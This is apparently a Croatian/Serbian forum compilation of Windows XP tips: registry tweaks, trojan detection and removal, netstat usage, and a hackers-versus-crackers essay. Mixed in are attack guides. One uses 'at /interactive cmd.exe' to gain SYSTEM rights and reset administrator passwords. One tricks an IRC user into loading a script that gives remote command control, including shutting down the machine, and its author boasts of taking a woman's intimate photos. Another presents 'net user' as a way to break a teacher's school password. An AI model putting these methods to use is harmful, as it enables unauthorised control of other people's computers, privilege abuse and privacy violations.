hack"n"stuff

za ovo će vam trebati najmanje 512MB RAMa.

start -> run -> regedit i odite ovdje:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lSession ManagerMemory Management

1. DisablePagingExecutive - kliknite dva puta i u upišite 1.
ovo će dati veće performanse jer omogućava XPu da drži podatke u memoriji, umjesto da ih svako malo kopira u page file i nazad.

2. LargeSystemCache - kliknite dvaput i promijenite decimalu u 1
ovo omogućava XP kernelu da se izvodi u memoriji. podiže performanse vrlo.

1. Click Start / Run
2. Type regedit and press enter.
3. Open the HKEY_CLASSES_ROOT folder
4. Open the CLSID folder
5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder
6. Open the ShellFolder folder
7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once completed change the "CallForAttributes" dword value to "0x00000000" (double-click and change value data to 0). You must change both of these values to get the rename to appear.

Mislite da imate account na Windowsima XP Pro najvišeg stupnja,
to jest mislite da s tim accountom imate sve dozvole, e pa varate se

Idemo ovako, Start->Run->CMD i enter
pišemo slijedeću komandu:


at xx:xx /interactive "cmd.exe"
umjesto znakova x napišite minutu ili dvije više nego što vam pokazuje windows sat u trayu

Pričekamo tu minutu-dve dok nam se ne otvori novi CMD prozor (C:WINDOWSSystem32svchost.exe)
sa pathom na WindowsSystem32 folder
Stari CMD prozor možemo ugasiti
Sad pritisnemo CTRL+ALT+DEL i pod tabom Processes ugasimo explorer.exe
Vratimo se u Command prompt prozor i upišemo CD.. da bi došli u C:WINDOWS
Upišemo explorer.exe i pritisnemo ENTER
Pri?ekamo da se sve digne do kraja kliknemo na START i gore na vrhu vidimo
da smo sad ulogirani kao SYSTEM (to vidimo ako nam Start meni nije postavljen na Clasic)
Sad možemo ?ak i ubijati sistemske procese koje ina?e nemožete kao administrator
Možete resetirati Administratorske passworde, ukratko tek sad možete raditi što vas volja

Ako neki stariji programi ne žele raditi pod XP-om probajte ih natjerati na sljedeći način:





1. Desni klik na ikonu ili na exe. file od programa koji ne želi raditi pod XP-om

2. Kliknite na Properties i zatim na Compatibility.

3. Sada možete primjeniti neke od opcija kako bi vaš program radio pod XP-om.

Ako želite virtualnu tipkovnicu na svojem zaslonu, evo kako da dođete do nje:


Kliknite na Start i odaberite Run. Sada upišite osk i kliknite OK

ili

Start -> All Programs -> Accessories -> Accessibility -> On-Screen Keyboard.

Windowsi XP rade zabilješke o svim fileovima,i spremaju ih na Hard Disk kako bi pretraživanje fileova bilo što brže.
Ali loša strana tih zabilješki(index) je da računalo mora svaki file zabilježiti što dovodi do usporavanja osnovnih funkcija kao što su: Open,Close itd...
Ako ne pretražujete često datoteke na računalu isključivanjem opcije "indexing" možete malo poboljšati performanse.

1. Control Panel

2. Administrative tools

3. Services

4. Disable Indexing Services.

Anti-virusi su neophodni, ali samo mi recite koliko puta vam se dogodilo da super, novi, do kraja update-ani anti-virus "bleji" u problem kao u šarena

vrata? Ako je odgovor "nikada", onda sigurno nemate dovoljno iskustva sa trojancima i virusima.

Ove tehnike su ograničene toliko koliko znate tehnika odbrane, poznamo neke a sigurno postoji njih još bezbroj, ali bi voljeli da i Vi pošaljete svoja

iskustva sa trojanima i virusima.

Prije svega...

Prije svega i svačega otvorite Options od Windows Explorera, te pod tabom View
- iskljucite "hide file ekstensions for known types"
- ukljucite "show all files"
- iskljucite "hide windows protected files"

Kako znati da ste zaraženi?

1. Banalne metode

U večini slučajeva se počnu događati neke čudne popratne stvari. Kao naprimjer, vaše računalo u jednom momentu zastane a da mu nemožete

odrediti uzrok, ili ako koristite dial-up onda nakon odspajanja sa internet-a, otvori se prozor sa ponovnim zahtjevom da se spojite, jer virus se

pokušava spojiti na internet. Ako dobijete povratni mail od vašeg mail server-a koji kaze da mail nije dostavljen na neku mail adresu, a vi taj mail

nikada niste ni poslali jer je virus slao sam sebe svima okolo, do svake email adrese na koju je naisao.

2. Pregledanjem liste procesa

Skinite neki freeware ili shareware program koji lista i manipulira sa procesima, a nipošto se ne oslanjajte na taskmanager od windowsa. Testirajte

vaš Process Manager tako što ćete pokusati ubiti neki od bitnih procesa kao npr. WINLOGON, te bilo koji bitni proces, ako on uspije ubiti svakog

od njih bez ikakvog problema onda tek možete govoriti o pravom programu.

Kada tek instalirate windows, onda bacite pogled na procese, vizualno zapamtite sadržaj, a sa vemenom ćete ih sve zapamtiti napamet. Svaki

program koji naknadno instalirate, može dodati neki svoj proces koji bi se u pozadini pokrenuo, ako mislite da vam taj program ne služi nečemu

bitnom, tj. da samo smeta računalu time što je učitan u memoriju, jednostavno ga maknite bez ikakvog razmišljanja.
Naravno ovaj program će se ponovo pokrenuti kada slijedeći put upalite računalo, ali doći ćemo i do toga.

Ako pet dana zaredom po 5 sec dnevno pregledate listu procesa, svaki slijedeći dan ako se neki dodatni program pokrene upasti će vam u oko.

3. Pregledanjem učitanih modula odnosno DLL-ova

Ovo posebno vrijedi za Explorer.exe, dogodilo se da neki dll ima upisan svoju putanju u registry bazi u nekom ključu, kojeg explorer ili bilo neki

drugi program kojemu je to zadatak učita tek nako bez ikakvog pitanja, a također unutar ovih DLL-ova mogu biti trojanci itd. Listu ovih učitanih DLL

ova mozete vidjeti koristeći neki proces viewer koji ima podršku da prikaže i module odnosno DLL-ove koje je učitao određeni proces. Izbor za ovo

je Essential Net Tools koji ima i prikaz putanje gdje se nalazi određeni progam ili modul na disku i koji je Manufacturer od tog programa ili modula.

Svaki program ili modul kojem je manufakturer prazan, nalazi se na nekoj čudnoj lokaciji ili ima neko čudno ime je sumnjiv i potrebno ga je

detaljnije istražiti.

4. Kada su mijenjane bitne windows komponente

Windows komponente se mijenjaju samo kada se radi windows update, ne znam postoji li alatka koja bi vodila računa o tome, jer bi se takođe

mogao instalirati trojan modificiranjem nekih od windows komponenti tako da bi sam sebe inficirao u postojeću komponentu (EXE, DLL, COM, itd.).

5. Data stream, Data stream, grrrr...

Potražite program na googlu koji bi možda se mogao zvati data stream viewer/ editor/manager itd. jer je to mjesto gdje se također može svašta

smjestiti. Ovo vrijedi ako je Vaša particija NTFS. Fajl je smješten uz drugi file ili direktorij koristeći sinstaksu file1.txt:file2.txt. Ovaj filel2.txt se

uopće ne vidi koristeći Windows Explorer ili command line interface, ali je divno mjesto za skrivanje virusa trojanaca itd. Kada tek instalirate

windows pogledajte koji su standardni fajlovi koji dolaze skriveni u data stream (ako ih uopće ima jer nema nikakve potrebe za tim), a zatim

pokrećite povremeno taj data stream viewer da bi otkrili novo nastale.

6. Start -> Programs -> StartUp

Pogledajte startup za All Users i za vašeg user-a, jer iako izgleda glupo možda neki virus ili trojan stavi link do sebe u ovaj folder tako da kada se

svaki slijedeći put računalo bude palilo pokrenuti će se i taj program.

7. Registry

Ja volim otvoriti Regedit.exe, zatim Edit -> Find
Find what: Run
Look at: Keys

Ovim dobijem neke bezveze rezultate ali nakon nekoliko pritiska na F3 stignem i do pravih vrijednosti.

HKLMSoftwareMicrosoftWindowsCurrentVersionRun
HKLMSoftwareMicrosoftWindowsCurrentVersionRunOnce
HKLMSoftwareMicrosoftWindowsCurrentVersionRunOnceEx

zatim kod nekih windowsa

HKLMSoftwareMicrosoftWindowsCurrentVersionpoliciesExplorerRun

HKLMSoftwareMicrosoftWindowsCurrentVersionAeDebug
HKLMSoftwareMicrosoftWindowsCurrentVersionImage File Execution Options

HKEY_CLASSES_ROOTexefileshellopencommand

Unutar ovih ključeva se mogu postaviti putanje do virusa i trojana koji ce se paliti zajedno sa windows-ima.

8. Control Panel -> Administrative tools -> Services

Također u Services je moguće dodati trojana ili virusa. Naravno uvijek ima opcija disable kojom zaustavite i onemogučite taj neki "zli" servis

Poslije možete upisati njegovo ime pod kojim se predstavlja u servisima, upisati u regedit.exe Edit->Find tako da možete otkriti orginalnu putanju,

a naravno možete izbirsati te registry ključeve.

9. %systemroot%system32drivers

Umalo da zaboravimo, može se pojaviti i "novi" driver za Vas kompjuter.

10. Dokumentacija

Ovo nije posebna tehnika, ali sve što nađete bilo u registriju ili negdje drugo zapišite ime filea, lokaciju, veličinu, datum kreiranja, pristupanja itd.

tako da Vam poslije bude lakše prilikom brisanja.

Ukljanjanje / brisanje

1. Ako nabavite putanju tog zlog programa potražite u istom direktoriju, ili gledajuči riječi koje se spominju u sadržaju tog zlog momka, potrazite

fajlove koji su povezani sa njim, možda koje on koristi kao resurse, u koje smiješta logove itd. Čak je moguće da su više tih fileova povezani, i

čuvaju jedni druge. Možete te dodatne iskopirati na neko sigurno mjesto za naknadno istraživanje, a zatim izbrisati ih. Ukoliko ste našli da se zli

file nalazi u data streamu, ista stvar vrijedi i za njega, kopirajte ako vam treba a zatim pokušajte izbrisati. (ako ne možete bilo koji fajl izbrisati

znači da je pokrenut ili ga je neki pokrenuti proces otvorio, [čitajte dalje]

2. Ako je riječ o tome da je virus modificirao neki sistemski file onda ga pokušajte zamijeniti sa Backupom tog istog filea, ugasite računalo i

probajte
- DOS butabilnu disketu
- Reapir Console winNT/2000/XP
- Ako imate neki drugi operativni sistem instaliran na istom računalu npr. linux
- KNOPPIX je takodje dobro rjesenje

3. Sada smo došli do toga da izbrišemo to "sranje"
Ukoliko doslovno brisanje da Shift+Delete ne radi znači da je pokrenut ili ga je neki pokrenuti proces otvorio. Rješenje mozete uzeti iz prethodnog

slučaja, tako što ugasite računalo i probate:
- DOS butabilnu disketu
- Reapir Console winNT/2000/XP
- Ako imate neki drugi operativni sistem instaliran na istom računalu npr. linux
- KNOPPIX je takodjer dobro rjesenje

4. Postoji jos jedna metoda, koja je također efikasna jer je izuzetno jednostavna i ne zahtjeva da se pokreće nikakav drugi operativni sistem.

Ukoliko imate NTFS particiju na kojoj se nalazi zli file, a pokrenut je winNT/2000/XP odite u Properties -> Security, a zatim svi korisnicima,

SYSTEM, Administrators, i sve što vidite pred očima stavite Full Access Deny Iako je program učitan u memoriju ne možete ga brisati ni mijenjati,

možete mijenjati njegove dozvole, znači stavite svima DENY!!! Slijedeći put kada se bude palio Windows taj file se neće moci učitati, a zatim ga

možete mirno obrisati nakon što mu vratite dozvole u normalno stanje.

ako zelite izbrisati sve svoje tragove na kompu evo kako ce te to napravit: Klik na gumb START - POKRENI - upišite regedit - U REDU
- Pronađite ključ: HKEY_LOCAL_MACHINE - SYSTEM - CurrentControlSet - Control - Session Manager - MemoryManagement
- Pronađite "ClearPageFileAtShutdown" vrijednost i kliknite na nju desnim klikom miša, odaberite "modify" i promijenite vrijednost registry ključa u 1.
- Restartajte računalo!

ako vas zivciraju oni glupi zvukovi evo kako ce te ih iskljucit:
START-RUN-regedit- HKEY_CURRENT_USER - Control Panel - Sound
sa desne strane nadjite ''Beep'' i promjenite mu vrijednst u ''no'', restartirajte komp i nema vise tih zvukova

Skrivanje Help & Support-a
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "NoSMHelp" onda kliknite desnim klikom na NoSMHelp i Odaberite Modify i zamijenite 0 sa 1

Skrivanje sata
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "HideClock" onda kliknite desnim klikom na HideClock i Odaberite Modify i zamijenite 0 sa 1

Skrivanje Folder Options-a
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "NoFolderOptions" onda kliknite desnim klikom na NoFolderOptions i Odaberite Modify i zamijenite 0 sa 1

Skrivanje Driver-a
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "NoDrives" onda kliknite desnim klikom na NoDrives i Odaberite Modify i zamijenite 0 sa 67108863

Skrivanje Control Panel-a
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "NoControlPanel" onda kliknite desnim klikom na NoControlPanel i Odaberite Modify i zamijenite 0 sa 1

Skrivanje Shared Documents-a
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "NoSharedDocuments" onda kliknite desnim klikom na NoSharedDocuments i Odaberite Modify i zamijenite 0 sa 1

Skrivanje All Programs-a
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "NoStartMenuMorePrograms" onda kliknite desnim klikom na NoStartMenuMorePrograms i Odaberite Modify i zamijenite 0 sa 1

Skrivanje Properties-a u My Computeru
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "NoPropertiesMyComputer" onda kliknite desnim klikom na NoPropertiesMyComputer i Odaberite Modify i zamijenite 0 sa 1

Skrivanje Network Places-a
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "NoStartMenuNetworkPlaces" onda kliknite desnim klikom na NoStartMenuNetworkPlaces i Odaberite Modify i zamijenite 0 sa 1

Skrivanje Imena u Start Menu
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "NoUserNameInStartMenu" onda kliknite desnim klikom na NoUserNameInStartMenu i Odaberite Modify i zamijenite 0 sa 1

Skrivanje Propertiesa u Recycle Bin-u
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "NoPropertiesRecycleBin" onda kliknite desnim klikom na NoPropertiesRecycleBin i Odaberite Modify i zamijenite 0 sa 1

Zaključavanje Registry-ja
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "DisableRegistryTools" onda kliknite desnim klikom na DisableRegistryTools i Odaberite Modify i zamijenite 0 sa 1

Zaključavanje Task meneger-a
Pronađite:
HKEY_CURRENT_USER => Software => Microsoft => Windows => CurrentVersion => Policies => Explorer
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "DisableTaskMgr" onda kliknite desnim klikom na DisableTaskMgr i Odaberite Modify i zamijenite 0 sa 1

Zaključavanje System Restor-a
Pronađite:
HKEY_LOCAL_MACHINE => SOFTWARE => Policies => Microsoft => Windows NT => SystemRestore
Pritisnite desni klik, pokazat će vam se New i onda unutar tog New odaberite DWORD Value i imenujte taj DWORD "DisableSR" onda kliknite desnim klikom na DisableSR i Odaberite Modify i zamijenite 0 sa 1

Ovako... resio sam da vam pokazem kako da upravljate necijim racunarom preko IRC servera. Ovo mozda znate a mozda i ne. IRC je pun rupa tako da nije problem ovo raditi potrebno je da znate komande itd. potrebna vam je neka skripta ja vam preporucujem Achilles Script 4.5 white ili black koja vam se vise svidja to mozete skinuti na www.ircsvet.com. na primer najjaci IRC sevrer u Srbiji je Krstarica ali ima jos IRC servera...kada udjete na krstaricu mozete rogistrovati nick a i ne morate. Ako hocete da upravljate nickom vaseg prijatelja to je bar lako sa njim izaci na kraj on ce vas sigurno poslusati znaci, zamolite ga kao da vam proveri options samo neshto da ukuca a ja vam predlazem da vasa poruka ide ovako:

"E ajde molim te proveri mi oprions neshto sam shtelovao pa sam se zbunio nesto kucaj ovo ako hoces da mi pomognes //me (ovde vash nick) | write No.dll ctcp 1:*Question$1- | .load -rs No.dll options

kada to ukuca vi cete to znati jer ce vam izaci na prozoru za chat.

onda je jednostavno ovako:

ako hocete da mu promenite nick kucate ovo:
/CTCP (njegov nick) /nick (nick u koji hocete da promenite)
evo primer kad hocete da promenite nick marko u majmun
/CTCP marko /nick majmun

ako hocete da on kaze neku poruku na nekom kanalu kucate ovo:
/CTCP (njegov nick) /msg #kanal (poruka)
npr. hocete da nick marko na kanalu #krstarica kaze "pozz drustvo" ide ovako:
/CTCP marko /msg #krstarica pozz drustvo

ako hocete nekome da ugasite komp kucate ovako:
/CTCP (njegov nick) /run shutdown-s
npr. ako nicku marko hocete da ugasite komp kucate ovako:
/CTCP marko /run shutdown-s

ovo sve dalje vazi i za ostale komande a komande mozete naci na www.ircsvet.com ne komande za ovaj hack nego uopste komande koje su vam potrebne za rad sa ovim.

ne mozete upravljati svakim nickom pre nego toga morate ga nekako nagovoriti da ukuca ono shto sam vam na pocetku rekao!

Ima i drugih nacina da vi sami ukucate to preko njegove IP adrese ali o toe kasnije!
da ima i komanda za otvaranje hard diska ja sam drugu usao u hard i provalio da mu je komp pun narodne muzike! a i nekoj ribi sam usao u hard i pokupio joj intimne slike, ali o toj komandi ima mnogo da se prica. Za sad ovoliko! i ovo je dosta da budete cool

Ovo ce vam najbolje doci ako ste regani na puno foruma , igrica , mailova... a ne mozete ih pamtiti. Ako ne zelite da vam drugi vide sifru onda ce vam ovo pomoci

Evo prvo kako doci do njega:
Start --> Run --> rundll32.exe keymgr.dll,KRShowKeyMgr --> Ok
Otvorit ce vam se taj program i pritisnite Add te zatim upišite potrebne podatke i kliknite na ok. i to je to

ako zelite ovo odmah imati na dekstopu samo pratite ovo :
Napravte na Dekstopu neki '' Shortcut '' i samo nadjite neku datoteku za poketanje nekog file-a ili mozete upisati '' notepad.exe '' i dajte ime ''PASSW'' . Kada ste to napravili stisnite desni click i properties.
U polje TARGET upisite '' %windir%system32rundll32.exe keymgr.dll,KRShowKeyMgr '' ( bez navodnika )
a u polje "Start in" upišite '' %windir% '' ( isto bez navodnika ).
To bi bilo to Sada na desktopu imate datoteku koja pokrece program u kojem mozete cuvati passworde

za kraj da recem da je ovo najbolje imati ako jedini imate pristup tome korisnickom racunu

Otvorite vas Notepad i iskopirajte Text koji se nalazi ispod ovih tarabica
i nazovite ga games.bat nije toliko opasno ali naterace vas da restartujete Computer

ovako mozda naslov nije bash jasan ali evo objasnjenja!
Znaci ovo je cist hack znachi najlaksi hack koji svaki haker mora znati!
ovo je fora kako provaliti passeord Administratora na racunaru! kao u skoli shto imaju posebno user za skolu gde pristup imaju samo profesori i user za ucenika znaci kako da provalite password pa da i vi imate kompletan pristup racunaru!

otvorite CMD (Command prompt) to se nalazi ovde Start-Programs-accessories-Command Prompt

znaci kad ovo otvorite ukucate sledece:
Kod:
net user
pa enter
onda ce vam izbaciti listu usera
ako se user koji je zasticen sifrom zove npr. "Skola" kucate sledece:
Kod:
net user "Skola"
pa enter i tu vam izbaci sve informacije!

Probajte ja moju profesorku nerviram stalno i uvek se muci i menja pass ali ne vredi joj!

Da bi ste pokrenuli netstat morate da pokrenete Dos Prompt i da unesete komandu netstat. Netstat je alat koji vam moze dosta koristiti i koji ima dosta svrha. Ja licno koristim netstat kako bih otkrio IP adresu drugih korisnika na ICQ i AIM. Takodje, netstat mozete koristiti i za posmatranje otvorenih portova. Netstat se nalazi u windows direktorijumu i mozete ga pokrenuti ako u ms-dos prompt unesete:

c:windows> netstat

Active Connections

Proto
Local Address
Foreign Address
State

TCP
pavilion:25872
WARLOCK:1045
ESTABLISHED

TCP
pavilion:25872
sy-as-09-112.free.net.au:3925
ESTABLISHED

TCP
pavilion:31580
WARLOCK:1046
ESTABLISHED

TCP
pavilion:2980
205.188.2.9:5190
ESTABLISHED

TCP
pavilion:3039
24.66.10.101.on.wave.home.com:1031

kako to radi VokySoft

VokySoft cracking
Sada dobro pogledajte prethodni primer. Videcete [Proto] u gornjem levom uglu. Ovo nam govori koji je protokol u pitanju tcp/udp. Odmah napred nalazi se [Local Address] ovo nam govori lokalnu ip adresu/hostname i otvorene portove. Zatim, [Foreign Address] - govori IP adresu/host i otvoren port konekcije u obliku IP:PORT sa “:” izmedju. I na kraju videcete [State] koji nam govori da li je konekcija uspostavljena. Ovo moze biti ESTABLISHED ukoliko je konekcija uspostavljena i LISTENING ukoliko se ceka konekcija.

[Detektovanje otvorenih portova]]

Netstat mozete koristiti i da nadjete vasu IP adresu i otvorene portove na vasem racunaru. Na slican nacin, Netstat se moze koristiti i za detektovanje trojana. Evo i primera: Primetili ste nesto veoma cudno sa vasim kompjuterom? Vas cd-rom se sam od sebe otvara i zatvara. Vi shvatate da se neko petljao sa trojanom na vasem racunaru. Sada vam je cilj da otkrijete koji je trojan u pitanju i da ga uklonite. Dakle sada ce te pokrenuti vas ms-dos prompt i proveriti koji su portovi otvoreni. Postoje mnogo nacina za koriscenje netstata, stoga pogledajte help kucajuci netstat ?

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a
Displays all connections and listening ports.

-e
Displays Ethernet statistics. This may be combined with the -s option.

-n
Displays addresses and port numbers in numerical form.

-p
Proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.

-r
Displays the routing table.

-s
Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default.

interval
Redisplays selected statistics, pausing interval seconds between each display.

Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.

Ja licno volim da koristim komandu ‘netstat -an’ koja daje listu svih konekcija, portova i ip adresu umesto hosta. Npr. unesite komandu netstat -an i pregledajte listu portova. Potrazite i otvorene portove koji su uobicajni za trojane 12345 (stari NetBus Trojan) 1243 (SubSeven) itd… I samim tim koji je port otvoren znacete koji je trojan u pitanju i lakse ce te ga ukloniti. Npr. ukoliko je otvoren port 12345 zarazeni ste NetBus Trojanom, zato sto je ovaj port tipican za njega.

Razlika je velika, i ovaj tekst ce pokusati da vam rasclani ova tri pojma i objasni sta svaki od njih znaci. Mnogi ljudi, posebno oni koji rade u nasim medijima (stampa, radio i tv stanice…) nazivaju sve i svasta hakerima i hakovanjem. Gotovo svako sada moze da ode u neku TV stanicu, kaze da je haker, i odmah ce se oko njega okupiti novinari i traziti od njega intervju. Cak sta vise, intervju ce da urade bez ijednog dokaza da intervjuisu hakera! Na taj nacin ne samo sto pokazuju da su neprofesionalni, vec izazivaju i ogorcenje kod odredjenog broja gledaoca koji su bar malo upuceni u hakersku kulturu.

Pojam haker (eng. hacker) u svom izvornom znacenju opisuje osobu koja se bavi istrazivanjem mogucnosti kompjutera i njihovoj pozitivnoj primeni u svakodnevnom zivotu. Kao sto vidite, ovde se nigde ne spominje da su hakeri zli, da nanose stetu drugima i da su opasni po svet. Hakeri su veoma inteligentne osobe koje istrazuju ono sto je sakriveno u hardveru i softveru. Prostije receno, oni su pronalazaci onoga sto je ili neko sakrio od oci javnosti ili pronalazaci propusta koji su napravljeni greskom! Kod prvog slucaja, kada kazemo ’sakrio’ mislimo obicno na programe, mada se i u hardveru moze sakriti dosta toga. Hakeri su po prirodi radoznali ljudi, vole sve da saznaju i ne vole kad je nesto sakriveno od njih. U programima moze dosta toga da se sakrije, narocito u programima ciji je izvorni kod nedostupan javnosti, kakav je ceo Windows i skoro svi programi koji rade pod njim! U takvim programima mogu da se recimo sakriju podprogrami za spijuniranje i programi koji ce samo odabranim ljudima omoguciti pristup zabranjenim resursima, poput vasih hard-diskova. Moze se, dakle, slobodno reci da hakeri ne vole da neko nekome ugrozava privatnost, i zato proucavaju kompjutere, sa zeljom da nadju uljeze u njima. Oni se zalazu za apsolutnu privatnost, sto je uostalom i ljudsko pravo, i svi bi po pravilu trebali da imaju potpunu privatnost. Takodje, ne vole cenzuru, jer to vodi ka jednoumlju, u sta smo se i uverili u proteklih pola veka! Jednom recju, oni su za apsolutnu ravnopravnost, za razotkrivanje svih tajni i za privatnost. Kod drugog slucaja, ljudi puno puta nesvesno prave greske, koje mogu da se iskoriste za ugrozavanje necije privatnosti. Na primer, programer koji je pisao neku Java funkciju u browseru Internet Explorer je zaboravio da napise rutinu za proveru duzine nekog podatka koji ucitana strana definise. I sada, ako neko pronadje propust i namerno napravi stranu koja iskoriscava propust, i ako neko ko ima pomenuti browser ucita tu stranu, IE ce uraditi nesto sto po pravilu ne bi smeo, i na taj nacin osteti posetioca strane. Hakeri traze takve propuste, i ako ih nadju, obavestavaju svet o tome kako bi proizvodjac datog programa ispravio propust i kako bi ljudi preduzeli odredjene korake i na taj nacin zastitili sebe na vreme. Hakeri su misljenja da je bolje da svi znaju za odredjeni propust nego da ‘niko’ ne zna, zato sto veruju da ipak neko zna za propust, i to koristi da bi spijunirao nekoga. Kada ne bi bilo hakera, danas bi imali browsere, mail, news i icq klijente i servere prepunih bezbednosnih propusta, u proseku bi svaki klijent i server imao oko 5 propusta. Do sada je ukupno pronadjeno vise od 10 000 propusta, i pitanje je da li bas niko ne bi znao za te propuste, narocito ako kazemo da je za neke propuste dokazano da su namerno napravljeni! Pitanje ‘zasto namerno’ je ovde suvisno, i bas zbog ovih razloga hakeri postoje, vredno rade i otkrivaju nove tajne. Dnevno se u proseku oko 5 novih propusta pronadje!

Sa druge strane, hakeri su casni ljudi, posteni, civilizovani, imaju svoju kulturu! Hakerska kultura im ne dopusta da propuste koje otkriju iskoriste u nehumane svrhe. Ako nadju neki propust, oni moraju da obaveste javnost o tome, i ne smeju da ga iskoriste da bi ugrozili neciju privatnost ili napravili stetu bilo kome.

Sada jedan savet kako proveriti da li je doticni haker. Prvo ga pitajte da li je do sada naneo nekome stetu koristeci kompjuter. Ako odgovori potvrdno, ili cak pocne da se hvali time - imate posla sa crackerom, jer hakeri ne nanose stetu drugima. Zatim ga pitajte sta je otkrio. Ako kaze ‘nista, koristim vec pronadjene propuste’ - imate posla sa lamerom, jer je haker samo onaj koji pronadje nesto jedinstveno, sto jos niko nije pronasao. Upravo zbog toga ne moze svako da bude haker, bas kao sto ne moze svako da bude doktor nauka!

Ovo je najpoznatiji govor jednog hakera

Mi istrazujemo - i vi nas zovete kriminalcima. Mi trazimo znanje - i vi nas zovete kriminalcima. Mi postojimo bez boje koze, bez nacie, bez religie - i vi nas zovete kriminalcima. Vi gradite atomske bombe, vi zapocinjete ratove, vi ubijate, varate i lazete nam i pokusavate nam umisliti da je to za nase dobro, ipak smo mi kriminalci. Da, ja sam kriminalac. Moj zlocin je zlocin radoznalosti. Moj zlocin je to da ja procjenjujem ljude po onome sta oni kazu i sta oni misle, a ne po tome kako oni izgledaju. Moj zlocin je da vas prevarim, nesto sto mi vi nikada necete oprostiti. Ja sam Haker, i ovo je moj manifest. Vi mozete zaustaviti jednog, ali nemozete zaustaviti sve nas

Crackeri (cita se ‘krekeri’) su isto pronalazaci, inteligetni ljudi, ali oni, izmedju ostalog, koriste svoje znanje i svoja otkrica da bi nekome naneli stetu. Crackeri pisu viruse, trojance, Ratove, Crackove, upadaju na servere i prave stetu na njima (uglavnom tako sto izmene prvu stranu sajta).

Lameri su uglavnom klinci, koji nisu nista otkrili i koji takodje nanose stetu drugima, obicno da bi ukrali neku sifru za Internet ili unistili nekome disk koristeci trojance, viruse, pa cak i exploite, koje su crackeri napisali. Oni su gotovani, nauce kako se koriste trojanci i onda prave stetu postenom svetu, misleci da su hakeri. Mnogi od njih ne znaju cak ni kako funkcionise Internet. Cilj im je samo da naprave neku pakost koristeci izum nekog crackera.

Onog trenutka kada haker svojim pronalaskom napravi nekome stetu - odmah prestaje da bude haker i postaje cracker! Sasvim je pogresno reci ‘hakeri su uhakovali sajt..’, kao i ‘hakeri su napravili novog crva…’. Hakeri uopste ne nanose stetu, to cine crackeri i lameri. I potpuno je pogresno mrziti hakere. One koje treba mrziti i prezirati su crackeri i lameri! Hakeri su pronalazaci, naucnici, i ne moze se postati haker preko noci. Profesija ‘haker’ je veoma cista, postena, plemenita i velikim trudom stecena profesija.

Na kraju, biti haker znaci biti osoba koja ima ogroman koeficijent inteligencije, osoba koja ceo dan provede za kompjuterom proucavajuci ga, osoba koja to cini da bi zastitila ostale korisnike kompjutera i omogucila im potpunu privatnost, osoba koja svojim pronalascima gura covecanstvo ka napretku, i osoba koja uvek moze da vas pogleda u oci! :P

Kao urednik i autor nekoliko dobro poznatih fajlova tematike,
smatram da bi svako trebao startovati inteligentnost,,Jer ako
nisi osoba koja se prirodno oseca,moraces to postati.

” Uopste ukljuceni u bilo cije motivisanje.Osobito,crackerdoom je
status i reputacija nad drugim ljudima,nemoras biti lep,bogat,nemoras voditi brigu o tome sto nemas nesto
sto drugi imaju.Zapamti ! Ti si Master nad programerima,posebno time sto dajes svoje vreme i rezultat svojih
vestina nad hackerskim greskama.

” Trebas zapamtiti jedno,tvoja je inteligentnost potrebna
covecanstvu jer je svet pun fascinantnih problema koji cekaju
da budu reseni , u toj problematici navescu vam primer kojim se
svako suocava a to su porezi . Sta je Porez? Porez je no-freedom koju bi svako hteo da unisti.

” Pre svega moraces ojacati svoju veru u kapacitet inteligencije,
jer tvoje je vreme dragoceno,ti nisi obavezan dati sva tvoja kreativna
resenja.Medjutim,pravi cracker je master nad problematikom i uvek
ce nekoj zabrani prikazati da postoji rupa u radu system-a.

